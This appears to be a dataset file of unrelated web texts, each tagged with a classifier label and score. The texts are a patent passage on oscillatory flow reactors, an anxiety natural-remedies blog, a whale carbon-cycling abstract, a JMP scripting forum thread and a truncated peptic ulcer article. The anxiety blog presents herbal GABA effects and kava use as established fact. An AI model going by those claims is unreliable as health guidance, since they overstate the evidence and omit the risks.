oscillatory flow reactor ideal for use in many different applications, such as high-throughput library development, screening, and optimization of a wide range of physical/chemical processes including bi-phasic catalytic reactions, colloidal nanomaterial synthesis, liquid-liquid extraction, and partition coefficient measurement of organic substances. As illustrative examples, four specific applications of the oscillatory flow reactor will now be discussed. EXAMPLE 1 Screening of Semiconductor Nanocrystals (Quantum Dots) As a first example, an oscillatory flow reactor may be used for high-throughput in-situ screening of semiconductor nanocrystals (also known as quantum dots or “QD”). The emergence of QDs, with their unique physicochemical properties, have enabled breakthrough applications at the cellular and organism levels in biological imaging, and at the device level in light emitting diodes, solar cells and displays. Owing to the quantized energy levels associated with nanometer-sized QDs, their corresponding absorption and photoluminescence emission spectra are directly correlated and tuned with the size of QDs. The inventors have recognized that, with conventional QD preparation processes, the lack of control over the experimental parameters and unavailability of spectral information during intermediate growth stages of nanocrystals have inhibited the development and optimization of III-V QDs. The inventors have also recognized that the manual nature of batch scale techniques makes high-throughput screening and fundamental studies of colloidal QDs both time- and labor-intensive. An automated two-phase small scale platform based on controlled oscillatory motion of a droplet within a tubular reactor may be used for high-throughput in-situ studies of solution-phase preparation of semiconductor nanocrystals. The oscillatory motion of the droplet within the heated region of the reactor may enable temporal single-point spectral characterization of the same nanocrystals with a time resolution of, for example, three seconds over the course of the synthesis time without sampling, while removing the residence time limitation associated with continuous flow-based strategies. The developed oscillatory microprocessor may allow for direct comparison of the high temperature and room temperature spectral characteristics of nanocrystals. This automated strategy may enable the study of the effect of temperature on the nucleation and growth of II-VI and III-V semiconductor nanocrystals. The automated droplet preparation and injection of the precursors combined with the oscillatory flow technique allows 7500 spectral data, within a parameter space of 10 minute reaction time, 10 different temperatures and 5 different precursor ratios, to be obtained automatically using 250 μL of each precursor solution. The oscillatory microprocessor platform may provide real-time in-situ spectral information at the synthesis temperature, which can be useful for fundamental studies of different mechanisms involved during the nucleation and growth stages of different types of nanomaterials. One embodiment of an automated oscillatory flow reactor, shown in FIG. 3, consists of a 12 cm long tubular reactor (e.g., 0.0625 inch inner diameter, made of fluorinated ethylene propylene, FEP) embedded within a custom-machined aluminum chuck housing, two fiber-coupled LEDs and photodetectors, as well as a fiber-coupled UV-Vis light source and a miniature spectrometer. Four cartridge heaters, which may be embedded within the aluminum chuck housing (two on each side) in combination with a thermocouple embedded in the aluminum chuck, are used for heating the reactor. Three computer-controlled syringe pumps may be used to prepare the droplet with the desired molar ratio under inert atmosphere (e.g., argon) and to control its oscillation within the heated zone of the reactor. An illustrative example of one process will now be described. First, a 5-10 μL droplet containing precursor I is formed at the first T-junction and automatically moved toward the second T-junction using syringe 1 (e.g., which may inject pressurized argon at 10 psig). In the next step, using the tubing volume between the two T-junctions, the second precursor (5-10 μL) is automatically injected into the droplet of precursor I at the second T-junction. The prepared droplet is then moved into the heated zone (160° C.-220° C.) of the reactor using syringe 1 and oscillated back and forth between the two integrated fibers located at each end of the reactor for the pre-defined reaction time and at a set flow velocity. The change in the measured voltage of the photodetectors, shown in FIG. 5, is used as a threshold criterion to automatically switch the flow direction of syringe 1 (e.g., using LabVIEW), and thereby oscillating the droplet within the heated zone of the reactor. The overall process flow including the droplet formation, injection of precursor II into the previously formed droplet of precursor I, and in-situ absorption spectra data acquisition may be computer-controlled, e.g., via LabVIEW scripts. The constant oscillatory motion may help to ensure well-stirred mixing inside the droplet, owing, in some cases, at least in part to the two recirculation zones formed inside the droplet as in traditional segmented flow. In some cases, the automated oscillatory motion of the droplet within the reactor may remove one, two or three of the following limitations of continuous multi-phase platforms: (a) inter-relation of mixing characteristics and residence time, (b) residence time limitation due to a constant tubing length and (c) lack of in-situ characterization of individual droplets for multiple residence times. In contrast to continuous multi-phase strategies, the oscillatory microprocessor may allow utilization of the same flow velocity, thereby providing the same degree of mixing for different growth times and enabling single-point measurement of the same micro-reaction vessel without the need to adjust the flow velocity or the reactor length. Increasing the flow velocity or decreasing the reactor length will linearly decrease the time required for the droplet to complete each path inside the oscillatory zone, thereby decreasing the time-delay between each absorption measurement. However, as previously demonstrated in the field, the minimum required travel distance for a liquid droplet to form a complete recirculation (stirring) is three times of the total length of the liquid droplet (i.e., the minimum reactor length of ˜3 cm for a 20 μL droplet). Taking into account the minimum travel length of a droplet, as well as the time required to switch the flow direction of the carrier syringe pump (syringe 1 in FIG. 3) at each end of the oscillatory zone, and the time required for the droplet to reach a constant velocity, a total oscillatory flow reactor length of 12 cm from the left to the right side fiber-coupled LEDs was selected to cover a wide range of droplet volumes (5-30 μL). Utilization of an inert gas (e.g. argon) as the carrier phase may remove the need for finding a solvent with negligible miscibility with the QD solvent (e.g., octadecene) at high temperatures. The integration of the two-phase oscillatory platform with spectral characterization tools (i.e., absorption and fluorescence spectroscopy) enables real-time in-situ monitoring of the in-flow prepared QDs with a time resolution of 3 seconds, which may be otherwise difficult to accomplish in batch scale synthesis (limited to tens of seconds). A flow-cell located downstream of the reactor may be used for direct comparison of the high temperature to room temperature absorbance of the same semiconductor nanocrystals. A third fiber port (which may be perpendicular to the miniature spectrometer fiber) within the same flow-cell may enable in-line photoluminescence, PL, measurement of the in-flow prepared QDs. FIG. 4 depicts a time-series of bright-field images of one complete oscillation cycle of a droplet within the reactor. FIG. 5, as discussed above, depicts measured voltages of the two photodetectors placed on the left, L, and right, R, sides of the aluminum chuck at times (I) and (II) highlighted in FIG. 4. The dashed line shows the threshold voltage used for switching the flow direction of the carrier syringe. EXAMPLE 2 Studying the Ligand Exchange Process of Colloidal QDs As a second example, an oscillatory flow reactor may be used for real-time in-situ studies of the ligand exchange process of colloidal QDs tuned for a desired application (e.g., solar cells or biomedical imaging). For the synthesis of colloidal QDs, ligands are specifically chosen to tune the conversion of formed monomers into nanocrystals with desired shape, size, and functionality. It has previously been demonstrated that organic ligands with long hydrocarbon chains (e.g., oleic acid or trioctylphosphine) can achieve the desired level of control during the colloidal synthesis of QDs. However, the final applications of colloidal QDs (e.g., biomedical or photovoltaics) usually require a capping ligand with a different functionality (e.g., water soluble, or smaller QD-to-QD distance). The application-driven demand for a different capping ligand requires ligand exchange after conventional colloidal synthesis of QDs using organic ligands. FIG. 6A depicts the ligand exchange process of CdSe QDs from organic ligands (oleic acid) to inorganic ligands (sulfur ions) for solar cell applications. The ligand exchange process expands the functionality of QDs by enabling replacement of original organic ligands (selected for the synthesis) by the application-specific molecule, including inorganic ions and polymers. The inventors have recognized that understanding the fundamentals of the ligand exchange reactions and the associated kinetics of this process would enable the design of next generation inorganic ligands for solid-state devices and photovoltaics applications, as well as biomedical applications (e.g., in-vivo bio-imaging). The inventors have appreciated that the formation of micro-emulsions during the ligand-exchange process involving two immiscible phases, along with the time required for the separation of the two immiscible fluids, makes the in-situ (or offline using manual sampling) characterization of the exchange of the capping ligands challenging, and in some cases (fast kinetics in the order of 1-3 min) even impossible using a conventional batch scale technique (FIG. 6B). In one illustrative example, an oscillatory flow reactor arrangement was used for real-time in-situ studies of the ligand exchange process of colloidal nanocrystals tuned for the desired application (e.g., solar cells or biomedical imaging). As seen in FIG. 6C, which is a schematic of an illustrative process using an oscillatory flow reactor, the surface-energy enabled phase separation of the two immiscible fluids at each oscillation cycle within the oscillatory multiphase flow reactor arrangement enables in-situ studies of the ligand exchange reaction for colloidal QDs. FIG. 7 depicts one illustrative embodiment of an oscillatory flow reactor arrangement, which includes a horseshoe-shaped tubing and a single-point optical detection as discussed previously, and a computer-controlled liquid handler (loaded with a wide range of ligands). The integrated fiber-coupled light source and UV-Vis spectrometer within the horseshoe oscillatory flow reactor enables in-situ optical characterization of the colloidal nanocrystals within each phase at each oscillation cycle. The same optical detection point was also used as the feedback device for automatic switching of the flow direction through a computer controlled syringe pump (e.g., via LabView). The oscillatory flow reactor was applied towards studies of the (1) ligand exchange of CdSe QDs from oleic acid (dissolved in toluene) to sulfur (dissolved in formamide); and (2) ligand exchange of CdSe QDs from oleic acid (dissolved in toluene) to cysteine (dissolved in phosphate buffered saline). FIG. 8 depicts an illustration of steps associated with injection of the organic phase containing QDs (darkest shade) into the other immiscible fluid (e.g., formamide) and the subsequent oscillatory motion of the bi-phasic slug within the tubular reactor. EXAMPLE 3 Measurement of Partition Coefficients As a third example, an oscillatory flow reactor may be used for rapid in-situ partition coefficient measurements of drug molecules. A partition coefficient (sometimes known as a distribution coefficient) describes the hydrophilicity or hydrophobicity of a compound between two immiscible phases, and has a wide range of applications in the pharmaceutical industry (e.g., pharmacokinetics and pharmacodynamics) and environmental sciences (i.e., groundwater contamination). Conventionally, a partition coefficient is measured on a batch scale basis using the “shake-flask” method (using UV spectroscopy or HPLC for analysis), as shown in FIG. 6A. The inventors have recognized that the large diffusion length scales associated with batch techniques necessitate the creation of micro-emulsions to promote mass transfer; in turn, the presence of these emulsions increases the time required for separation of the two immiscible phases after equilibrium, making the batch scale technique a time- and labor-intensive process. The inventors have also recognized that the manual batch scale technique is challenging to apply to partition coefficient measurements at physiologically-relevant temperatures (i.e., 37° C.). Over the past decade, continuous microscale multi-phase strategies, owing to their enhanced heat and mass transfer characteristics, have been developed as an alternative route to batch scale multi-phase processes such as liquid-liquid extraction and screening of gas dissolution and solubility. Multi-phase microfluidics approaches have also been applied for measurement of partition coefficient between two immiscible phases. These microscale strategies have (i) used a microfluidic device as an efficient mixing method for “fast” equilibrium times and downstream phase separation and collection of each phase for manual measurements, (ii) utilized fluorescence microscopy for measurements of the extraction of a fluorescent molecule from one phase to another, or (iii) used gravity and as the method of shaking (mixing) and phase separation. The inventors have recognized that, with these strategies, the phase separation process, downstream collection, and manual characterization of each phase makes the measurement a semi-batch process. In addition, the inventors have recognized that fluorescence microscopy limits the applicability of the measurement technique to fluorophore molecules. The inventors have appreciated that, these limitations, along with a constantly increasing need for rapid and accurate partition coefficient measurement of organic substances between two immiscible phases, necessitate the development of a fully automated small-scale process for in-situ measurement and screening of partition coefficient at the desired temperature. As discussed previously, taking advantage of the difference between the surface energies of aqueous and organic solvents on a FEP (or, e.g., PTFE or PFA) substrate, a fully automated small-scale strategy may be used based on gas-driven oscillatory motion of a bi-phasic slug for high-throughput in-situ measurement and screening of partition coefficients of organic substances between aqueous and organic phases. In one illustrative example, the oscillatory flow strategy enabled single partition coefficient data point measurement within 8 min (including the sample preparation time) which is 360 times faster than the conventional “shake-flask” method, while using less than 30 μL volume of the two phases and 9 nmol of the target organic substance. The developed multi-phase strategy was validated using a conventional shake-flask technique. The developed strategy was also extended to include automated screening of partition coefficients at physiological temperature. FIG. 9 depicts a schematic of an automated multi-phase oscillatory flow reactor arrangement for in-situ measurement of partition coefficient. Syringe 1 withdraws liquid from the sample vials and delivers into the sample loop. Syringe 2 delivers carrier phase, pre-filled with 10 psig nitrogen. Syringe 3 injects the organic phase (1-octanol) into the aqueous phase (DI Water) containing the organic substance. FIG. 10 depicts an illustration of different steps associated with injection of the organic phase into the aqueous phase and the subsequent oscillatory motion of the bi-phasic slug within the tubular reactor. Using the difference between the surface energies of the aqueous and organic phases on a FEP (or, e.g., PTFE or PFA) substrate enables time-resolved in-situ spectral characterization of the organic substance within each phase without additional phase separation. In addition, the use of gas (e.g., nitrogen) as the carrier phase facilitates the oscillatory motion, which may remove the residence time limitation associated with continuous multi-phase microscale platforms. The oscillatory motion of the bi-phasic slug enables single-point spectral characterization of the bi-phasic slug during the transfer of the organic substance from the aqueous to the organic phase, as well as at the equilibrium state. While traditional techniques (with distinct mixing and measurement stages) often require assumptions about equilibration time, the system described herein can detect equilibration both quantitatively and automatically. As an illustrative example of one result, FIG. 11 depicts bright-field snapshot time-series of the oscillatory motion of a bi-phasic slug (DI water, 15 μL, and 1-octanol, 10 μL) along the FEP tubing embedded within the aluminum chuck. The organic phase (1-octanol) was labelled with Sudan red for better visualization. The dashed lines in frames 5 and 10 highlight the aqueous phase. In section (i) of FIG. 11, the UV absorption spectra of both phases are recorded and the flow direction is reversed. In section (ii), a change in the measured voltage of the fiber-coupled photodetector results in the detection of the bi-phasic slug, and the flow direction is reversed. Finally, in section (iii), completely separated aqueous and organic phases within the bi-phasic slug enter the UV spectral measurement point. EXAMPLE 4 Photoredox Cataylsis As a fourth example, an oscillatory flow reactor may be used for in-flow studies of visible-light photoredox catalysis. Over the past decade, visible-light photoredox catalysis using metal complexes (e.g., polypyridyl complexes of ruthenium and iridium) has steadily been developed as a promising strategy for sustainable and green synthesis of fine chemicals. The relatively long lifetime (˜1 μs) associated with the photoexcited states of metal complexes may result in a bimolecular electron transfer pathway (chemical reaction) instead of deactivation. For instance, photoredox catalysis has successfully been employed for batch scale coupling reactions, reductive dehalogenation, and oxidative hydroxylation. However, the inventors have appreciated that the inverse correlation of the reaction vessel size and penetration depth of the irradiated light has resulted in reaction times on the order of hours. The high surface area to volume ratio offered by microscale flow chemistry technologies has addressed the aforementioned limitation of batch scale photochemical reactors by reducing the characteristic reaction vessel length scale from tens of centimeters to hundreds of micrometers. Nevertheless, the inventors have recognized that the direct correlation of the mixing and residence times and limited range of residence times for a pre-defined reactor length in combination with the reagent volume required per reaction condition make it challenging to employ continuous flow chemistry approaches for high-throughput screening, characterization, optimization and library development of photoredox catalysis reactions. FIG. 12 shows one illustrative example of an oscillatory flow reactor arrangement used as a microscale photochemistry platform for in-flow studies of visible-light photoredox catalysis. This arrangement capitalizes on the removed residence time limitation and enhanced mixing and mass transfer advantages of oscillatory flow strategy. The position of the formed droplet (micro-reaction vessel) at the inlet and outlet of the oscillatory flow reactor is detected through a single-point optical detection, integrated within a custom-machined aluminum chuck housing. The optical feedback provided through the single-point position detection allows for automated switching of the flow direction of the carrier phase to ensure the droplet is always under the same irradiation intensity over the course of the photoredox catalysis process. FIG. 13 depicts a closer view of the horseshoe oscillatory flow reactor, and FIG. 14 summarizes some advantages/capabilities of the reactor arrangement. Such an arrangement may allow for the effect of irradiation light intensity on the yield (obtained using in-flow LC-MS) and selectivity of the photoredox catalysis to be precisely characterized by automatic tuning of the irradiation power of the high power LED (e.g., through LabView). FIG. 15 depicts an exploded view of the reactor integrated with a high power LED and a peltier cooler. In addition, utilizing gas as the carrier phase in both sides of a droplet that is pre-formed via a computer-controlled liquid handler (containing the desired photocatalyst) provided sufficient gas molecules during the photoredox catalysis using a reactive gas as an oxidant (e.g., oxygen). Through adjusting the pressure of the carrier phase, the effect of gas concentration (e.g., oxygen pressure) on the photoredox catalysis (e.g., oxidative hydroxylation of phenylboronic acids) could be studied. FIG. 16A summarizes a study investigating the effect of catalyst loading on oxidative hydroxylation of arylboronic acids. FIG. 16B summarizes a study investigating the effect of solvent on oxidation of aromatic hydrocarbons. Finally, FIG. 16B summarizes a study obtaining the minimum required photon flux for aerobic oxidation of aldehydes. Such an arrangement may enable material efficient high-throughput screening and optimization of continuous (e.g., reaction time and concentration of the photocatalyst) and discrete (e.g., different metal complexes, and reaction solvents) parameters associated with a photoredox catalysis process using only, for example, 20 μL volume of the solution mixture per experimental condition. The obtained optimized parameters (e.g., photocatalyst molecule structure, concentration, solvent, irradiation power, and reaction time) may then be employed for large-scale (numbered up) continuous synthesis of the desired product under a similar characteristic length scale. Multiplexing According to one aspect, a plurality of reactors may be used to run multiple reactions at different temperatures simultaneously. These reactions can have different or similar compositions and reaction times. In some embodiments, oscillation movement within the reactors may be accomplished using an electromagnetic valve connected to two different pressure sources. By alternating between these two pressure levels, the droplet can move forward or backward. The valve may be computer controlled. Each reactor may have its own electromagnetic valve to allow for independent reactions. One or more of the reactors may be curved to allow for single-point detection, as discussed above. A multi-way selector valve may be used to guide each droplet toward its own reactor, and another multi-way valve may be used to guide the target droplet after completion of the reaction towards a sample loop for injection into a HPLC/MS unit or other component suitable for the desired application. One illustrative embodiment of a multiplexed reactor arrangement is shown in FIGS. 17A-19. As seen in FIGS. 17A-17B, the multiplexed arrangement 100 includes four reactors 1, 2, 3 and 4, each having a curved tubing and single optical port. The multiplexed arrangement may include a support 12, as seen in FIG. 18. The arrangement shown in FIGS. 17A-19 can run 4 different reactions simultaneously. However, in other embodiments, a multiplexed arrangement can be used to run 2, 3, 5, 6, 7 or 8 reactions at a time, depending on the number of reactors that are included in the arrangement. In some embodiments, the number of reactors in a multiplexed arrangement may be limited to the capacity of the multi-way selector valve. FIG. 19 is a schematic detailing the components of one embodiment of a multiplexed arrangement 100. The arrangement includes 4 reactors, R1, R2, R3 and R4. The arrangement includes a multi-port (e.g. 6-port) injection valve 87 that allows for injection of a fixed volume (e.g., 2-40 uL) of the reagent mixture into the multiplexed reactor. The looped, lighter-colored line of 87 inside the circle is the sample loop (between 2-40 uL). In the initial configuration (during sample preparation), the sample loop is not connected to the autosampler line. After preparation of the desired reagent mixture, the valve is triggered to connect the sample loop to the line coming from the autosampler (e.g., for valve 87, port 1 connects to port 2, and port 5 connects to port 6). After loading the reagent sample into the sample loop, using Syringe 1, the valve gets triggered to go back into its original position. As a result, the injected sample gets connected to the reactor line (the lighter colored line going from port 4 to the selector valve). The multi-port injection valve 87 is connected to a multi-way (e.g. 8-way) selector valve 81, which leads to the reactors. Each reactor line (R1, R2, R3, and R4) is connected to one of the output ports of the multi-way selector valve 81. In some embodiments, oscillatory motion inside reactor R1 is performed via an electromagnetic valve 80 connected to two different pressure sources, P1 and P2. P3 is the pressure level at the outlet, and is maintained at a constant value. To allow for oscillatory motion of a droplet by switching between the two pressure levels P1 and P2, P1 and P2 are set at levels such that P3 is at a level between P1 and P2. In other words, P1 is set at a level that is lower than P3, and P2 is set at a level that is higher than P3. In sum, P1<P3<P2 Each of the other reactors has its own electromagnetic valve to control oscillatory movement. A multi-way (e.g. 8-way) selector valve 83 is used to guide the target droplet after completion of the reaction towards a sample loop 85 for injection into a high performance liquid chromatography (HPLC) or liquid chromatography-mass spectrometry (LC-MS) unit. In this embodiment, the sample loop 85 is a 6-port valve. Each reactor line (R1, R2, R3, and R4) is connected to one of the input ports of the multi-way selector valve 83, while the common outlet port is connected to another multi-port (e.g. 6-port) injection valve 85 for sampling of each droplet coming from different reactors. Triggering of the multi-way selector valve 83 to the correct position after completion of each reaction (e.g., connecting the common outlet of the multi-way selector valve 83 to the line coming from reactor R2) enables automated sampling of the reaction mixtures without interfering with the other droplets or reactors. While aspects of the invention have been described with reference to various illustrative embodiments, such aspects are not limited to the embodiments described. Thus, it is evident that many alternatives, modifications, and variations of the embodiments described will be apparent to those skilled in the art. Accordingly, embodiments as set forth herein are intended to be illustrative, not limiting. Various changes may be made without departing from the spirit of aspects of the invention.
__label__pos
0.907564
Natural Remedies for Anxiety: Finding Calm Without Medication Anxiety is a common mental health condition that affects millions of people worldwide. It is characterized by feelings of worry, fear, and nervousness, which can interfere with daily activities and relationships. Anxiety can manifest in physical symptoms such as rapid heartbeat, sweating, and trembling. While there are various treatment options available, some people prefer to try natural remedies before resorting to medication. In this blog post, we will explore natural remedies for anxiety, including herbal remedies, nutritional remedies, lifestyle changes, and other alternative therapies. We will discuss the science behind these natural remedies and how they can help alleviate symptoms of anxiety. It is important to note that seeking professional help when dealing with anxiety is crucial, but natural remedies can be a useful tool in managing symptoms. Let’s dive in and learn more about natural remedies for anxiety. The science behind natural remedies for anxiety A. Explanation of how anxiety affects the body and mind: Anxiety can affect the body and mind in various ways. When a person experiences anxiety, their body goes into a “fight or flight” response, releasing hormones like adrenaline and cortisol. These hormones cause physical symptoms such as increased heart rate, sweating, and muscle tension. In the long term, chronic anxiety can lead to health problems such as high blood pressure, digestive issues, and a weakened immune system. Anxiety also affects the mind, causing racing thoughts, worry, and fear. It can interfere with daily activities and relationships, leading to a decreased quality of life. B. Overview of the science behind natural remedies for anxiety: Natural remedies for anxiety work by targeting various neurotransmitters and hormones in the body, helping to regulate mood and reduce anxiety symptoms. For example, some natural remedies like chamomile and valerian root have compounds that interact with GABA receptors in the brain, which are responsible for calming the nervous system. Other natural remedies like omega-3 fatty acids and magnesium have been shown to have anti-inflammatory effects, which can help reduce symptoms of anxiety. C. Explanation of how natural remedies for anxiety work: Herbal remedies for anxiety like chamomile, valerian root, passionflower, and kava can help reduce anxiety symptoms by acting on the nervous system. Chamomile, for example, has compounds that bind to GABA receptors in the brain, helping to reduce anxiety and promote relaxation. Valerian root has similar effects but also has compounds that can help improve sleep, which can be beneficial for those with anxiety. Nutritional remedies like omega-3 fatty acids, magnesium, and B-complex vitamins can also help reduce symptoms of anxiety. Omega-3 fatty acids have been shown to have anti-inflammatory effects, which can help reduce symptoms of anxiety. Magnesium is a mineral that plays a role in regulating neurotransmitters and can help reduce symptoms of anxiety. B-complex vitamins are essential for brain function and can help improve mood and reduce anxiety. Lifestyle remedies like exercise, meditation, breathing exercises, and yoga can also help reduce symptoms of anxiety. These remedies can help reduce stress and promote relaxation, which can be beneficial for those with anxiety. Natural remedies for anxiety Herbal remedies for anxiety: 1. Chamomile – Chamomile is an herb that has been used for centuries to help promote relaxation and reduce anxiety. It contains compounds that interact with GABA receptors in the brain, helping to reduce anxiety and promote sleep. 2. Valerian Root – Valerian root is an herb that has been shown to have calming effects on the nervous system. It contains compounds that interact with GABA receptors in the brain, helping to reduce anxiety and promote relaxation. 3. Passionflower – Passionflower is an herb that has been shown to have anxiolytic effects, meaning it can help reduce symptoms of anxiety. It contains compounds that interact with GABA receptors in the brain, helping to promote relaxation. 4. Kava – Kava is a plant native to the South Pacific that has been shown to have anxiolytic effects. It contains compounds that interact with GABA receptors in the brain, helping to reduce anxiety and promote relaxation. B. Nutritional remedies for anxiety: 1. Magnesium – Magnesium is a mineral that plays a role in regulating neurotransmitters and can help reduce symptoms of anxiety. It can be found in foods such as almonds, spinach, and avocado. 2. Omega-3 fatty acids – Omega-3 fatty acids have been shown to have anti-inflammatory effects, which can help reduce symptoms of anxiety. They can be found in foods such as fatty fish, nuts, and seeds. 3. B-complex vitamins – B-complex vitamins are essential for brain function and can help improve mood and reduce anxiety. They can be found in foods such as whole grains, leafy greens, and eggs. C. Lifestyle remedies for anxiety: 1. Exercise – Exercise has been shown to have a positive effect on mental health, including reducing symptoms of anxiety. It can help reduce stress and promote relaxation. 2. Meditation – Meditation is a practice that involves focusing the mind on a particular object or thought, helping to promote relaxation and reduce anxiety. 3. Breathing exercises – Breathing exercises can help regulate the nervous system and promote relaxation. They can be done anywhere and at any time. 4. Yoga – Yoga is a practice that combines physical movement with breathing exercises and meditation, helping to promote relaxation and reduce anxiety. Other natural remedies for anxiety A. Aromatherapy Aromatherapy involves using essential oils to promote relaxation and reduce anxiety. Essential oils such as lavender, bergamot, and chamomile can be diffused or applied topically to help reduce symptoms of anxiety. B. Massage Massage is a therapeutic technique that involves applying pressure to the muscles and soft tissues of the body. It can help reduce muscle tension and promote relaxation, which can help reduce symptoms of anxiety. C. Acupuncture Acupuncture is a traditional Chinese medicine practice that involves inserting thin needles into specific points on the body. It can help regulate the nervous system and promote relaxation, which can help reduce symptoms of anxiety. These natural remedies can be used alone or in combination with other remedies to help manage symptoms of anxiety. It is important to speak with a healthcare professional before starting any new natural remedies, especially if you have any underlying medical conditions or are taking any medications. Conclusion Anxiety is a common mental health condition that affects many people around the world. While medication and therapy are effective treatments for anxiety, natural remedies can also be helpful in managing symptoms. Natural remedies for anxiety include herbal remedies such as chamomile, valerian root, passionflower, and kava, nutritional remedies such as magnesium, omega-3 fatty acids, and B-complex vitamins, and lifestyle remedies such as exercise, meditation, breathing exercises, and yoga. Other natural remedies for anxiety include aromatherapy, massage, and acupuncture. However, it is important to speak with a healthcare professional before starting any new natural remedies. By incorporating natural remedies into a comprehensive treatment plan, individuals can find relief from symptoms of anxiety and improve their overall mental health and well-being. Share Leave a Reply Your email address will not be published. Required fields are marked * Secured By miniOrange
__label__pos
0.977014
Cetaceans as Oceanic Engineers Cetaceans play important roles in marine ecosystems and can be regarded as oceanic ecosystem engineers. By enhancing nutrient cycling and carbon storage and sequestration, cetaceans have the capacity to alter their environment. Whales release buoyant, nutrient-rich fecal plumes in surface waters that can stimulate phytoplankton growth, creating the essential foundation upon which marine life relies. Whale-mediated vertical flux of nutrients to the surface from below the mixed layer, and horizontal flux via migration from nutrient-rich feeding grounds to nutrient-poor breeding grounds, can be especially important in enhancing ecosystem functioning. Cetaceans also contribute to ‘blue carbon’, which refers to the natural processes through which the ocean traps carbon. Whale-stimulated phytoplankton that is unconsumed may sink to depth, leading to carbon storage and/or sequestration. Through their large body sizes and long lifespans, cetaceans have great capacity to store carbon for decades to centuries. When carcasses sink to the seafloor, that lifetime of stored carbon can be sequestered for millennia. As many populations recover from commercial whaling and other stressors, there is increasing potential for whales to enhance nutrient and carbon cycling. While intriguing, understanding of these processes is still largely in its infancy. However, there are ample opportunities to integrate data collection within current and future research programs to advance knowledge of the fine-scale mechanisms through which cetaceans contribute towards nutrient and carbon cycling. Understanding the role of cetaceans and other marine life in the carbon cycle is a potentially innovative and important strategy for combatting climate change that can be used alongside strategies to directly reduce fossil fuel emissions. Date/Time:  Monday, March 15, 2021 - 16:00 to 16:30 Time for questions:  Monday, March 15, 2021 - 16:30 to 16:45 Heidi Pearson University of Alaska Southeast
__label__pos
0.954488
News On June 1, we’re asking you to select a content label when starting a new topic in the Discussions area. Read more to find out why. Choose Language Hide Translation Bar Highlighted nvi nvi Level I Is it possible to combine two pictures in one expression column? Hi,   I have a table with two expression columns containing pictures. When I hover the mouse over the data points only one picture is displayed, despite both columns being labelled.  What is the easiest way to display both pictures at the same time? For instance, is it possible to combine the two pictures in a single expression column so that when this is labelled, both pictures get displayed? I have tried to group the expression columns but still, only one picture gets displayed.   Thanks,   Nuria 0 Kudos 6 REPLIES 6 Highlighted txnelson Super User Re: Is it possible to combine two pictures in one expression column? Within JMP you have the ability to play with pictures.  Here is one possible way of creating what you need:twopic.PNG Names Default To Here( 1 ); dt = Open( "$SAMPLE_DATA/Big Class Families.jmp" ); pic = dt:picture[1]; pic2 = dt:picture[2]; hlb = H List Box( pp = Picture Box( pic ), Picture Box( pic2 ) ); outpic = hlb << get picture; dt:picture[3] = outpic;   Jim Highlighted Craige_Hales Staff (Retired) Re: Is it possible to combine two pictures in one expression column? Nice! Craige 0 Kudos Highlighted nvi nvi Level I Re: Is it possible to combine two pictures in one expression column? Hello,   That is very nice. Thank you! Now, I should have mentioned that I have never ever written a JMP script before. I can see from your example what the scritp is doing. Taking the pictures from position 1 and 2 and putting them together in position 3, in the same "picture" column. I have tried to implement that in my table by changing where it says "picture" to "the name of my column column" but it doesn't do anything. What am I missing? Also, I should mention that I have two columns with 180 pictures each and would like to combine them in a third new column to have a double picture. Is there a way to do that for all of them at the same time?   Thanks,   Nuria         0 Kudos Highlighted txnelson Super User Re: Is it possible to combine two pictures in one expression column? Can you upload a sample of the script you are using, and also a sample of the data table the images are in? That would be very helpful. Jim 0 Kudos Highlighted Re: Is it possible to combine two pictures in one expression column? This will make a nice graphlet in a few weeks... :) 0 Kudos Highlighted Re: Is it possible to combine two pictures in one expression column? OK, it has been a "few weeks" and JMP 15.0 is finally out. This means you can take advantage of new features such as graphlets that were designed to support customizations such as this. Just RMB on the graph background, launch the Hover Label Editor and add the following script (based on @txnelson solution, thx!) in the Graphlet Picture tab: dt = local:_dataTable; pic = dt:picture[local:_firstRow]; pic2Idx = If(local:_firstRow == NRows(), 1, local:_firstRow + 1); pic2 = dt:picture[pic2Idx]; hlb = H List Box( pp = Picture Box( pic ), Picture Box( pic2 ) ); hlb << get picture; No need to add new columns. A graph with pinned tooltips would look like the following: graphlet_two_images.jpg For more information on graphlets, check https://www.jmp.com/content/dam/jmp/documents/en/support/jmp15/using-jmp.pdf, page 512.
__label__pos
0.979378
Peptic ulcers: what causes them? Peptic ulcers occur in the stomach (gastric ulcers) and the first part of the small intestine (duodenal ulcers). They result from an imbalance between factors that help maintain the protective lining of the stomach and duodenum and factors that can lead to damage and erosion of this mucosal lining. Most peptic ulcers are caused by either infection with Helicobacter pylori or regular use of medicines called non-steroidal anti-inflammatory drugs (NSAIDS), including aspirin. Almost all duodenal ulcers are associated with H. pylori infection, while stomach ulcers are commonly caused by NSAID use. In the past it was believed that peptic ulcers were caused by stress, poor dietary habits (including eating too much rich, fatty or spicy foods), alcohol and caffeine. It’s now known that these things don’t cause peptic ulcers, but they may increase the amount of acid made in your stomach and make your symptoms worse if you do have an ulcer. H. pylori infection Helicobacter pylori (H. pylori) is a corkscrew-shaped bacterium that can infect the inner lining of the stomach. H. pylori was discovered by Australian researchers in a huge breakthrough that has revolutionised the understanding and treatment of ulcers worldwide. Most types of bacteria cannot live in the stomach because it is a very acidic environment. But H. pylori can live there because it makes an enzyme called urease. Urease produces neutralising agents which protect the H. pylori from the strong acid of the stomach. H. pylori infection is common, especially in developing countries. Infection rates are lower for Western countries. About 30 per cent of adults in Australia are thought to be infected. How do you get H. pylori infection? Most people become infected during childhood. H. Pylori can be passed from person to person through direct contact with either saliva or faeces. Although doctors are not certain, they suspect the bacteria may be spread through sharing food, cutlery and utensils for eating and drinking with infected people. H. pylori has been detected in the saliva of infected people, leading scientists to think that it may also be spread by mouth-to-mouth contact, such as kissing. Inadequate hand washing after going to the toilet and untreated water are other ways that the bacteria can be spread. Most people infected with H. pylori do not get peptic ulcers (but many do get gastritis – inflammation of the stomach). Why some infected people develop ulcers while others do not is not entirely clear. Whether an infected person develops an ulcer or not may depend on their personal characteristics, environmental or hereditary factors. How does H. pylori cause ulcers? H. pylori can penetrate and live in the lining of the stomach and duodenum, where it causes inflammation. Persistent inflammation interferes with and changes the protective lining of the stomach and duodenum. This can lead to increased acid production and erosion of the lining, which may form an ulcer. NSAIDS and stomach ulcers Long-term or frequent use of medicines called non-steroidal anti-inflammatory drugs (NSAIDs) – such as aspirin, ibuprofen and naproxen – can cause stomach ulcers. Up to 30 per cent of people using NSAIDs develop a peptic ulcer, but many don’t know it because they don’t have any symptoms. The risk of developing an ulcer depends on the type of NSAID used and the dose. Some NSAIDs are more likely to cause ulcers than others, and higher doses are associated with a greater risk. In addition, among 